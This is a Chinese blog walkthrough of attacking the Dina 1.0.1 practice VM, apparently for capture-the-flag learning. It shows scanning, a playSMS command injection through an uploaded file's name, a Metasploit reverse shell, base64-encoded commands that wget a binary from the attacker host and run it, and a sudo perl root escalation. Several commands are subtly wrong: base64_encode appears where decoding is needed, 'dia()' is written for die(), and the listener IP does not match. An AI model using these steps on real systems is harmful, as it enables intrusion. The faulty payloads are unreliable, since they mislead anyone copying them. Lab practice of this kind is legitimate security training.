6.26.1 命令注入靶场

 

目录

 靶场导入

尝试是否能通信

扫描开放的端口

扫描目录 

 对敏感目录进行访问

用收集信息进行登陆后台

搜索sms框架漏洞

根据42003文件翻译信息进行操作

设置反弹shell监听

进行提权操作:


 (4条消息) CTF-命令注入_ctf 命令注入_不知名白帽的博客-CSDN博客

(4条消息) 靶机渗透测试(Dina: 1.0.1)_dina 1.0_@小张小张的博客-CSDN博客 

 

 靶场导入

右键使用vm打开导入

弹出导入失败 ,直接点重试

靶场地址3.137  3.141  3.148

kali地址 192.168.3.117

尝试是否能通信

 

扫描开放的端口

nmap -sV 192.168.3.137

扫描目录 

 nikto -host http://192.168.3.137

 

 

 对敏感目录进行访问

http://192.168.3.137/tmp/

说明开启了apache

 

点击进入 

 

 

http://192.168.3.148/wp-config.php

 

 http://192.168.3.137/uploads/

 http://192.168.3.148/robots.txt

http://192.168.3.148/nothing/

 

 view-source:http://192.168.3.148/nothing/

 

http://192.168.3.137/secure/

 下载.zip

 

 联想之前的密码freedom尝试后成功解压

发现打不开mp3打开属性  发现不是真mp3文件,用记事本打开 

 

 

用收集信息进行登陆后台

http://192.168.3.148/SecreTSMSgatwayLogin/index.php?app=main&inc=core_auth&route=login

 

尝试nothing网页得到的密码:diana 成功登陆

 

(4条消息) PlaySMS_战神/calmness的博客-CSDN博客

网页是playSMS框架  可以到kali利用searchsploit搜索信息

搜索sms框架漏洞

searchsploit playSMS 

 

searchsploit -p 42003.txt

 

cat /usr/share/exploitdb/exploits/php/webapps/42003.txt

 翻译信息:

(4条消息) CTF-命令注入_ctf 命令注入_不知名白帽的博客-CSDN博客

在本地创建1.csv文件(空文件只要是.csv后缀)

 

 

返回playsms网页

选择文件上传

 

 

 

在sms网页上传1.csv文件 

 

打开代理,进行抓包

根据42003文件翻译信息进行操作

将1.csv改成<?php system('uname -a'); die();?>.php

 

 进行放包

 

重新再上传抓包 发送给repeater  命令改为id

<?php system('id'); die();?>.phpid

 进行放包

 当前用户id和组id是33

以上操作说明filename存在代码执行和代码注入

设置反弹shell监听

msfconsole   

 

use exploit/multi/handler

 

set payload linux/x86/meterpreter/reverse_tcp

打开另一个终端查看地址

 

set lhost 192.168.3.117

 

set lport 4444

run

 

 

打开另一个终端

msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=192.168.3.137 lport=4444 -f elf > /var/www/html/shell

 

 

绕过防火墙

 

 

在浏览器进行抓3次放3次绕过防火墙的bash64的包 

本地返回playsms页面上传文件抓包

burp在filename处放

<?php system(base64_encode('放置base64代码')); dia();?>.php

1.

<?php system(base64_encode('d2dldCBodHRwOi8vMTkyLjE2OC4zLjExNy9zaGVsbCAtTyAvdG1wL2EK
')); die();?>.php

 

 进行放包

2.

<?php system(base64_encode('Y2htb2QgNzc3IC90bXAvYQo=
')); die();?>.php

进行放包:

 

 

3.

<?php system(base64_encode('L3RtcC9hCg==
')); die();?>.php

进行放包

 

进行提权操作:

Kali利用msf入侵Windows电脑(最详细包会) - 元宇宙-Metaverse - 博客园 (cnblogs.com) 

(5条消息) 靶机渗透测试(Dina: 1.0.1)_dina 1.0_@小张小张的博客-CSDN博客

(5条消息) 靶机实战-Dina 1.0_dina 靶机实验_滕财然的博客-CSDN博客 

 

(5条消息) 靶机渗透测试(Dina: 1.0.1)_dina 1.0_@小张小张的博客-CSDN博客

进行下面的操作  其实上面的放3次包监听过程可忽略,进行如下操作即可 

输入以下命令

 shell

ls
sudo perl -e "exec '/bin/sh' "
bash -i
cd /root

ls
cat flag.txt

(4条消息) CTF-命令注入_ctf 命令注入_不知名白帽的博客-CSDN博客

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值